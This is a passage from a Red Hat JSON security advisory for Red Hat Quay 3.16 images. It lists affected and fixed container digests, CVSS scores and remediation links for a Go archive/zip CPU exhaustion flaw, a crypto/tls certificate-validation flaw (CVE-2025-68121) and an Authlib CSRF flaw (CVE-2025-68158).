"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6567"
},
{
"category": "workaround",
"details": "To mitigate this vulnerability, implement a timeout in your archive/zip processing logic to abort the operation if it exceeds a few seconds, preventing the application from consuming an excessive amount of resources.",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip"
},
{
"cve": "CVE-2025-68121",
"discovery_date": "2026-02-05T18:01:30.086058+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2437111"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is a moderate flaw because it only occurs under specific conditions, such as TLS session resumption with runtime changes to certificate authority settings. Exploitation is not straightforward and requires a controlled setup. The impact is limited to certificate validation within the same component and does not affect system availability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
],
"known_not_affected": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "RHBZ#2437111",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437111"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-68121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68121"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://go.dev/cl/737700",
"url": "https://go.dev/cl/737700"
},
{
"category": "external",
"summary": "https://go.dev/issue/77217",
"url": "https://go.dev/issue/77217"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk",
"url": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4337",
"url": "https://pkg.go.dev/vuln/GO-2026-4337"
}
],
"release_date": "2026-02-05T17:48:44.141000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T15:21:25+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6567"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption"
},
{
"cve": "CVE-2025-68158",
"cwe": {
"id": "CWE-352",
"name": "Cross-Site Request Forgery (CSRF)"
},
"discovery_date": "2026-01-08T19:01:41.615962+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2428102"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Authlib, a Python library used for building OAuth and OpenID Connect servers. The cache-backed state and request-token storage within Authlib is not securely linked to the user\u0027s initiating session. This vulnerability allows a remote attacker to exploit a Cross-Site Request Forgery (CSRF) by obtaining a valid state, which can lead to unauthorized actions being performed on behalf of the user.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Authlib: Authlib: Cross-Site Request Forgery due to improper session management in state storage",
"title": "Vulnerability summary"
},
{
"category": "other",
